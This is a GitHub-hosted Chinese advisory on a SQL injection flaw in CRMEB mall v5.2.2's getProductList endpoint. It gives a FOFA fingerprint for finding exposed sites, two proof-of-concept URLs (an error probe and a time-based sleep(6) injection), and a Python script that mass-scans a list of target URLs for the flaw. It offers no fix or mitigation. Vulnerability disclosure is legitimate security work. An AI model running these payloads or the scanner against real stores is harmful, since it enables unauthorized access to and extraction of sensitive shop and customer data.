Skip to content

Latest commit

 

History

History
58 lines (45 loc) · 1.95 KB

CRMEB开源商城v5.2.2存在sql注入漏洞.md

File metadata and controls

58 lines (45 loc) · 1.95 KB

CRMEB开源商城v5.2.2存在sql注入漏洞

CRMEB v.5.2.2 中的 SQL 注入漏洞允许远程攻击者通过 ProductController.php 文件中的 getProductList 函数获取敏感信息。

fofa

icon_hash="-847565074"

poc

/api/products?limit=20&priceOrder=&salesOrder=&selectId=)
/api/products?limit=20&priceOrder=&salesOrder=&selectId=0*if(now()=sysdate(),sleep(6),0) 

image-20240616153608225

image-20240616153711514

import requests
def check_vulnerability(url):
    # Remove trailing slash if present
    if url.endswith('/'):
        url = url[:-1]
    # Construct the URL with the required endpoint
    test_url = f"{url}/api/products?limit=20&priceOrder=&salesOrder=&selectId=)"
    try:
        response = requests.get(test_url)
        # Check if the response contains the specific string indicating a vulnerability
        if 'PDOConnection.php' in response.text:
            print(f"\033[31m[HIGH RISK]\033[0m Vulnerability found in: {url}")
        else:
            print(f"\033[32m[SAFE]\033[0m No vulnerability found in: {url}")
    except requests.RequestException as e:
        print(f"\033[33m[ERROR]\033[0m Could not connect to {url}. ")#Error: {e}")
def main():
    # Read URLs from url.txt
    with open('url.txt', 'r') as file:
        urls = file.readlines()

    for url in urls:
        url = url.strip()  # Remove any leading/trailing whitespace characters
        if not url.startswith('http'):
            url = 'http://' + url  # Add http scheme if missing
        check_vulnerability(url)
if __name__ == "__main__":
    main()

漏洞来源